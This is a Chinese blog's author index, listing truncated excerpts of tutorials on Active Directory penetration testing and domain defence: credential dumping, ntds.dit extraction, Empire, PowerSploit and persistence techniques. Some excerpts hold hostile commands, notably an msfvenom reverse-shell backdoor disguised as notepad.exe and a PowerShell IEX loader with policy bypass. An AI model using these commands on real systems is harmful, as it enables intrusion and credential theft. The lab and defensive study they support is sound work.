Micr067
这个作者很懒,什么都没留下…
展开
-
1.域渗透基础
一、域渗透基础1.域控:win server 20082.域内DC:win server 2008、win server 20033.域内PC:win7 x64、win7 x32、win xp1.域渗透基本命令ipconfig /all // 查询ip段,所在域等。net user // 本机用户列表net localgroup administrators // 本机管...原创 2019-08-28 00:00:32 · 457 阅读 · 0 评论 -
frp实现内网穿透
项目地址:https://github.com/fatedier/frp/releases下载对应版本程序wget https://github.com/fatedier/frp/releases/download/v0.27.0/frp_0.27.0_linux_amd64.tar.gz解压rm -rf frpc*编辑frps配置文件vim frps.ini[co...原创 2019-08-26 12:41:58 · 249 阅读 · 0 评论 -
3-pass the ticket
pass the ticket在域环境中,Kerberos协议被用来作身份认证,这里仅介绍几个名词:KDC(Key Distribution Center): 密钥分发中心,里面包含两个服务:AS和TGSAS(Authentication Server): 身份认证服务TGS(Ticket Granting Server): 票据授予服务TGT(Ticket Granting T...原创 2019-08-29 00:12:27 · 294 阅读 · 0 评论 -
ntds.dit和SSP权限维持
Kerberos认证工作原理https://www.cnblogs.com/huamingao/p/7267423.html5.获取访问活动目录数据库文件的权限(ntds.dit)前提条件是获取域控权限:1.通过备份路径(备份服务器储存,媒体,网络共享)2 在准备配置成域控的服务器上找 NTDS.dit 文件3. 有虚拟机的管理权限,就能克隆虚拟的域控并离线获取数据4. 用 ...原创 2019-08-30 08:14:04 · 547 阅读 · 0 评论 -
Empire – PowerShell后渗透攻击框架
0x01 简介Empire是一个后渗透攻击框架。它是一个纯粹的PowerShell代理,具有加密安全通信和灵活架构的附加功能。Empire具有在不需要PowerShell.exe的情况下执行PowerShell代理的方法。它可以迅速采用可后期利用的模块,涵盖范围广泛,从键盘记录器到mimikatz等。这个框架是PowerShell Empire和Python Empire项目的组合; 这使得它...原创 2019-09-12 22:26:53 · 359 阅读 · 0 评论 -
PowerSploit 用法
PowerSploitPowerSploit是基于PowerShell的后渗透框架,包含很多PowerShell攻击脚本,主要用于渗透中的信息侦查,权限提升,权限维持,github地址为: https://github.com/PowerShellMafia/PowerSploit安装 下载程序目录 git clone https://github.com/PowerShellMa...原创 2019-10-22 00:19:38 · 1491 阅读 · 1 评论 -
PowerUp攻击模块实战
PowerUp攻击模块实战演练1.将PowerUp.ps1脚本上传至目标服务器,然后在本地执行2.使用IEX在内存中加载此脚本,执行以下命令,脚本将进行所有的检查。powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('C:\PowerUp.ps1'); Invoke-A...原创 2019-10-22 23:47:38 · 744 阅读 · 0 评论 -
PowerShell渗透–Empire
0x00 简介Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterp...原创 2019-10-24 00:46:01 · 183 阅读 · 0 评论 -
PowerShell渗透--Empire
0x00 简介Empire是一款针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透攻击框架代码具有从stager生成,提权到渗透维持的一系列功能,无需powershell.exe就可以使用powershell的代理功能还可以快速在后期部署漏洞利用模块,内置模块有键盘记录,Mimikatz,绕过UAC,内网扫描等,可以躲避网络检测和大部分安全防护工具,类似于Meterpre...原创 2019-10-25 23:53:26 · 545 阅读 · 2 评论 -
PowerShell攻击:nishang
nishanhg下载地址:https://github.com/samratashok/nishing1.简介nishang的使用是要在PowerShell 3.0以上的环境中才可以正常使用。也就是说win7下是有点小问题的。因为win7下自带的环境是PowerShell 2.02.环境准备查看powershell版本get-host 或者 $PSVersionTable.P...原创 2019-10-26 23:11:01 · 550 阅读 · 0 评论 -
本地密码提取工具-LaZagne
简介:LaZagne项目是用于开源应用程序获取大量的密码存储在本地计算机上。每个软件都使用不同的技术(纯文本,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。该项目已作为开发后模块添加到pupy中。Python代码将在不接触磁盘的情况下在内存中进行解释,并且可以在Windows和Linux主机上运行。项目地址:https://github.c...原创 2019-11-13 21:32:12 · 2934 阅读 · 0 评论 -
活动目录使用备忘单
活动目录使用备忘单包含 Windows 活动目录的常见枚举和攻击方法的备忘单。工具Powersploit PowerUpSQL Powermad Impacket Mimikatz Rubeus- >编译版本 BloodHound AD Module ASREPRoast枚举使用 PowerView 获取当前域:Get-NetDomain Enum 其他域:Get-NetDomain -Domain <DomainName> ...翻译 2020-07-20 20:53:14 · 320 阅读 · 0 评论 -
内网渗透之域渗透
1.初识域环境什么是域域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个中央计算机集群上的中央数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 域(Domain)是将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫...原创 2019-11-24 17:59:22 · 3216 阅读 · 0 评论 -
检测并移除WMI持久化后门
WMI型后门只能由具有管理员权限的用户运行。WMI后门通常使用powershell编写的,可以直接从新的WMI属性中读取和执行后门代码,给代码加密。通过这种方式攻击者会在系统中安装一个持久性的后门,且不会在磁盘中留下任何文件。 WMI型后门主要有两个特征:无文件和无进程。其基本原理是:将代码加密存储在WMI中,达到所谓的无文件;当设定的条件满足时,系统将自动启动powershell进程去执行...原创 2020-05-05 12:33:12 · 1165 阅读 · 0 评论 -
域控制器DSRM账户安全防护
一、DSRM简介 1.DSRM(Diretcory Service Restore Mode,目录服务恢复模式)是windows域环境中域控制器的安全模式启动选项。域控制器的本地管理员账户也就是DSRM账户,DSRM密码是在DC创建时设置的,一般很少更改。DSRM的用途是:允许管理员在域环境出现故障时还原、修复、重建活动目录数据库。通过在DC上运行ntdsutil 工具可以修改DSRM密码...原创 2020-05-05 12:32:25 · 1403 阅读 · 0 评论 -
AD域SSP安全防护
一、简介 SSP(Security Support Provider)是windows操作系统安全机制的提供者。简单的说,SSP就是DLL文件,主要用于windows操作系统的身份认证功能,例如NTLM、Kerberos、Negotiate、Secure Channel(Schannel)、Digest、Credential(CredSSP)。 SSPI(Security Suppor...原创 2020-05-05 12:31:10 · 1167 阅读 · 0 评论 -
SID History域权限维持
一、简介 每个用户都有自己的SID,SID的作用主要是跟踪安全主体控制用户连接资源时的访问权限,SID History是在域迁移过程中需要使用的一个属性。 如果A域中的域用户迁移到B域中,那么该用户的SID值就会改变,进而其权限也会改变。导致迁移后的用户无法访问以前可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,如果迁移后用户的SID值改变,系统会将原...原创 2020-05-05 12:29:56 · 602 阅读 · 0 评论 -
使用批处理管理域控制器
1、AD活动目录的优点:-集中管理:对象主要是用户和计算机。-便捷的网络资源访问:用户登录域中任意一台计算机都可以访问域中的资源。-可扩展性:Ecchange服务器集中管理:-用户:用户描述、部门、邮件地址、电话和住址等。-联系人:所在公司的名称和地址、邮件地址、传真等。2.管理AD中的计算机、组合OU```@echo offtitle 批处理管理AD中的计算机、组...原创 2020-05-05 12:26:53 · 693 阅读 · 0 评论 -
使用卷影拷贝提取ntds.dit
一、简介 通常情况下,即使拥有管理员权限,也无法读取域控制器中的C:\Windows\NTDS\ntds.dit文件。使用windows本地卷影拷贝服务,就可以获得该文件的副本。 在活动目录中,所有的数据都保存在ntds.dit中。ntds.dit是一个二进制文件,存储位置为域控制器的%SystemRoot%\ntds\ntds.dit。ntds.dit中包含用户名、散列值、组、GPP...原创 2020-02-15 10:34:40 · 851 阅读 · 0 评论 -
导出ntds.dit中的散列值
1.下载NTDSXhttp://www.ntdsxtract.comgit clonehttps://github.com/csababarta/ntdsxtract安装python setup.py build && python setup.py install将导出的ntds.dit.export 文件夹中的datatable.3和link_table....原创 2020-02-15 10:32:33 · 376 阅读 · 0 评论 -
Exchange邮件服务器安全
Exchange是由微软推出的用于企业环境中部署的邮件服务器。Exchange在逻辑上分为三个层次:网络层(network layer)、目录层(directory layer)、消息层(messaging layer),服务器角色正是在消息层上的一个细分。Exchange Server 2010包含五个服务器角色,分别是邮箱服务器(mailbox server)、集线传输服务器(hub tran...原创 2020-02-14 15:17:59 · 723 阅读 · 0 评论 -
RAR、7-Zip在命令行下对数据进行压缩
3.6.1 RARWinrar的命令行模式程序在安装目录下的 rar.exe (打包压缩程序),unrar.exe(解压缩程序)RAR.exe的常用参数如下: -a 添加文件到压缩文件 -k 锁定压缩文件 -s 生成存档文件(这样可以提高压缩比) -p 指定压缩密码 -r 递归压缩,包括子目录 -x 指定要排除的文件 ...原创 2020-02-12 16:22:41 · 1139 阅读 · 0 评论 -
防范明文密码和散列值抓取
一、单机密码抓取的防范方法 微软为了防止用户密码在内存中以明文形式泄露,发不了补丁KB2871997,关闭了Wdigest功能。windows server 2012以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。对于win server 2012以下版本,通过安装KB2871997补丁,可以避免攻击者获取明文密码。 通过查看注册表键值,可以判断Wdigest功能状态...原创 2020-02-12 16:20:36 · 1275 阅读 · 0 评论 -
域渗透-LSA Protection
简介:微软在 2014 年 3 月 12 日添加了 LSA 保护策略,用来防止对进程 lsass.exe 的代码注入,这样一来就无法使用 mimikatz 对 lsass.exe 进行注入,相关操作也会失败。微软官方文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012...原创 2019-08-31 23:28:03 · 583 阅读 · 0 评论 -
Mimikatz on meterpreter
实验环境:kali 主机:192.168.88.193目标靶机:win2008 R2 192.168.88.130kali 主机上执行生成一个后门 exe:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.193 LPORT=443 -f exe -o notepad.exemsfconsole -r ...原创 2019-08-31 23:26:56 · 197 阅读 · 0 评论 -
win server 2008搭建域环境
0x00 简介1.域控:win server 20082.域内服务器:win server 2008、win server 20033.域内PC:win7 x64、win7 x32、win xp0x01.配置静态IP查看IP地址和网关DNS为127.0.0.1,域控安装过程中会默认安装DNS服务。0x02.安装活动目录角色win+R打开运行,输入dcp...原创 2019-08-25 22:12:55 · 250 阅读 · 1 评论